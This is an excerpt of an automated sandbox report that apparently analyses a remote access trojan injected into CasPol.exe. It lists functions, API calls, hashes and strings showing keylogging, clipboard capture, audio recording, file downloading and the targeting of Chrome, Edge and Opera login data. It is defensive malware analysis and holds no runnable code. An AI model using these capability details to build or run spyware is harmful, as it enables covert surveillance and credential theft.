                            • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                            • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                            • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                            • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                            Function 0044A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: __alldvrm$_strrchr
                            • String ID:
                            • API String ID: 1036877536-0
                            • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                            • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                            • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                            • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                            Function 00442801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                            • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                            • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                            • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                            Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            • Cleared browsers logins and cookies., xrefs: 0040C0F5
                            • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                            • API String ID: 3472027048-1236744412
                            • Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                            • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                            • Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                            • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                            Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                              • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                              • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                            • Sleep.KERNEL32(000001F4), ref: 0040A573
                            • Sleep.KERNEL32(00000064), ref: 0040A5FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$SleepText$ForegroundLength
                            • String ID: [ $ ]
                            • API String ID: 3309952895-93608704
                            • Opcode ID: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
                            • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                            • Opcode Fuzzy Hash: e4ff9062ebc1855ffc8709a41a4aeb88848ac43e96cbaf8abbe5df7ed01e55c0
                            • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                            Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                            • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                            • Opcode Fuzzy Hash: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                            • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                            Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                            • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                            • Opcode Fuzzy Hash: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                            • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                            Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                            • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID:
                            • API String ID: 3177248105-0
                            • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                            • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                            • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                            • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                            Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
                            • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleReadSize
                            • String ID:
                            • API String ID: 3919263394-0
                            • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                            • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                            • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                            • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                            Function 0041C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                            Download Yara Rule
                            APIs
                            • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleOpenProcess
                            • String ID:
                            • API String ID: 39102293-0
                            • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                            • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                            • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                            • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                            Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                              • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                            • _UnwindNestedFrames.LIBCMT ref: 00439891
                            • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                            • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                            • String ID:
                            • API String ID: 2633735394-0
                            • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                            • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                            • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                            • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                            Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                            • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                            • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                            • GetSystemMetrics.USER32(0000004F), ref: 00419402
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: MetricsSystem
                            • String ID:
                            • API String ID: 4116985748-0
                            • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                            • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                            • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                            • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                            Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                            Download Yara Rule
                            APIs
                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                              • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                            • String ID:
                            • API String ID: 1761009282-0
                            • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                            • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                            • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                            • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                            Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                            Download Yara Rule
                            APIs
                            • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorHandling__start
                            • String ID: pow
                            • API String ID: 3213639722-2276729525
                            • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                            • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                            • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                            • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                            Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                            • __Init_thread_footer.LIBCMT ref: 0040B797
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Init_thread_footer__onexit
                            • String ID: [End of clipboard]$[Text copied to clipboard]
                            • API String ID: 1881088180-3686566968
                            • Opcode ID: 1452d6304ce3f0295fff478f129f85fb29fa27eb4ce50424bc2e0dcad400a5b7
                            • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                            • Opcode Fuzzy Hash: 1452d6304ce3f0295fff478f129f85fb29fa27eb4ce50424bc2e0dcad400a5b7
                            • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                            Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ACP$OCP
                            • API String ID: 0-711371036
                            • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                            • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                            • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                            • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                            Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                            Strings
                            • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocalTime
                            • String ID: KeepAlive | Enabled | Timeout:
                            • API String ID: 481472006-1507639952
                            • Opcode ID: 94476530adddf729a94900e8ced82c90480f790f78fd79a0466f5c5f7008df8a
                            • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                            • Opcode Fuzzy Hash: 94476530adddf729a94900e8ced82c90480f790f78fd79a0466f5c5f7008df8a
                            • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                            Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNEL32 ref: 00416640
                            • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: DownloadFileSleep
                            • String ID: !D@
                            • API String ID: 1931167962-604454484
                            • Opcode ID: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                            • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                            • Opcode Fuzzy Hash: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                            • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                            Function 0041B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocalTime
                            • String ID: | $%02i:%02i:%02i:%03i
                            • API String ID: 481472006-2430845779
                            • Opcode ID: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                            • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                            • Opcode Fuzzy Hash: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                            • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                            Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                            Download Yara Rule
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: alarm.wav$hYG
                            • API String ID: 1174141254-2782910960
                            • Opcode ID: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
                            • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                            • Opcode Fuzzy Hash: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
                            • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                            Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                              • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                            • CloseHandle.KERNEL32(?), ref: 0040B0B4
                            • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                            • String ID: Online Keylogger Stopped
                            • API String ID: 1623830855-1496645233
                            • Opcode ID: 14d91ba3cc0780b58bc46c93ea61c46197eef5bd77683ed78bbf46c7536d2da3
                            • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                            • Opcode Fuzzy Hash: 14d91ba3cc0780b58bc46c93ea61c46197eef5bd77683ed78bbf46c7536d2da3
                            • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                            Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                            Download Yara Rule
                            APIs
                            • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                            • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: wave$BufferHeaderPrepare
                            • String ID: XMG
                            • API String ID: 2315374483-813777761
                            • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                            • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                            • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                            • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                            Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocaleValid
                            • String ID: IsValidLocaleName$JD
                            • API String ID: 1901932003-2234456777
                            • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                            • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                            • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                            • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                            Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                            Download Yara Rule
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: UserProfile$\AppData\Local\Google\Chrome\
                            • API String ID: 1174141254-4188645398
                            • Opcode ID: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                            • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                            • Opcode Fuzzy Hash: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                            • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                            Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                            Download Yara Rule
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                            • API String ID: 1174141254-2800177040
                            • Opcode ID: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                            • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                            • Opcode Fuzzy Hash: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                            • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                            Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                            Download Yara Rule
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: AppData$\Opera Software\Opera Stable\
                            • API String ID: 1174141254-1629609700
                            • Opcode ID: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                            • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                            • Opcode Fuzzy Hash: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
